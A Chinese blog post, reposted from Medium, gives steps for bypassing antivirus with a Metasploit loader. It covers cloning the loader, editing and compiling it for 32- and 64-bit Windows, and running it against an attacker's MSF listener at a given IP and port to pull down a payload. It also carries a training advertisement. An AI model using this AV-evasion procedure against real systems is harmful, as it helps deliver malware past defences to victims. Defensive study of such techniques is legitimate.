通过MSF加载器绕过AV
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
文章转自:
https://medium.com/securebit/bypassing-av-through-metasploit-loader-32-bit-6d62930151ad
https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
PS:这个metasploit-loader是8年前的东西了,我测试了下32位的,被杀很多,不像原作者说的全免杀,不知道是不是伪造的,64位的能过一些,随机应变吧
32位
git clone https://github.com/rsmudge/metasploit-loader.git

编辑metasploit-loader/master/src/main.c在main函数中,注释93-98行,修改99行如下

使用MinGW编译
i686-w64-mingw32-gccmain.c -o loadmeta.exe -lws2_32


执行

64位
使用Dev C ++工具编译
https://sourceforge.net/projects/orwelldevcpp/

确保安装完整,同时拥有32和64位

新建一个Project Loader64并将文件另存为Loader64。
将Project设置为C Project,将应用程序设置为Console Application。从命令行执行

将
https://github.com/rsmudge/metasploit-loader/blob/master/src/main.c
粘贴进去
修改以下内容

把#include <winsocks2.h>放在windows.h上面

编译选项中添加-lws2_32

F9编译
MSF监听

Windows上执行 Loader64.exe 192.168.137.128 9500


本文来自https://mp.weixin.qq.com/s/FnV5DhZZLESEFwyJXz4w6w,经授权后发布,本文观点不代表立场,转载请联系原作者。